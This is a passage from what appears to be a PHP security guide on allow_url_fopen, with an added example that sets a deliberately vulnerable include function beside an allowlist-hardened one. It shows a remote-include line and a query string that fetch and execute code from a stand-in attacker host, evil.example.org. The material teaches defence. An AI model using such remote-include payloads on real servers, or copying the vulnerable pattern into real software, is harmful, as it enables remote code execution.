A.1. allow_url_fopen

As illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they were local files:

<?php

$contents = file_get_contents('http://example.org/xss.html');

?>

Chapter 5 reveals how dangerous this is when combined with the use of include or require, because the remote file is not merely read but executed as PHP on your server:

<?php

include 'http://evil.example.org/evil.inc';

?>

I recommend disabling allow_url_fopen unless your application requires it.
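The following is an added example, not code from the book. It places the remote-include pattern above, as it typically appears when the include target comes from a request parameter, beside a hardened version that never passes user-controlled text to include, and it adds a startup check of the relevant INI directives. The pages directory, the PAGES allowlist, and the function names are assumptions made for illustration. The check also covers allow_url_include, a directive added in PHP 5.2 (after this text was written) that governs include and require separately from allow_url_fopen.

```php
<?php
// Added example (not from the book). Function names, the pages/ directory and
// the PAGES allowlist are assumptions for illustration.

declare(strict_types=1);

// Vulnerable pattern: the include target comes straight from the request.
// With allow_url_fopen (and, on PHP >= 5.2, allow_url_include) enabled,
// ?page=http://evil.example.org/evil.inc fetches and executes remote code.
function vulnerable_include(string $page): void
{
    include $page . '.inc';
}

// Hardened pattern: the request only selects a key from a fixed allowlist, so
// no user-controlled string ever reaches include, whatever the INI settings.
const PAGES = [
    'home'    => 'home.inc',
    'contact' => 'contact.inc',
];

function safe_include(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        exit('Unknown page.');
    }

    // realpath() resolves symlinks and ".." segments, so we can confirm the
    // file lies inside the intended directory even if the allowlist is
    // misedited later.
    $base = realpath(__DIR__ . '/pages');
    $path = $base === false ? false : realpath($base . '/' . PAGES[$page]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        exit('Include target is outside the pages directory.');
    }

    include $path;
}

// Startup check: report whether remote file access is still enabled.
// ini_get() returns '1' when a directive is on, '' or '0' when it is off,
// and false when the directive does not exist in this PHP build.
function remote_access_disabled(): bool
{
    $fopen   = filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
    $include = filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
    return !$fopen && !$include;
}

if (!remote_access_disabled()) {
    error_log('allow_url_fopen or allow_url_include is enabled; disable it in php.ini');
}

safe_include($_GET['page'] ?? 'home');
```

Both directives are PHP_INI_SYSTEM, so they cannot be turned off with ini_set() at runtime; the check above can only warn. Set allow_url_fopen = Off and allow_url_include = Off in php.ini (or the equivalent php_admin_flag lines in the web server configuration) and confirm the result with phpinfo() or php -i.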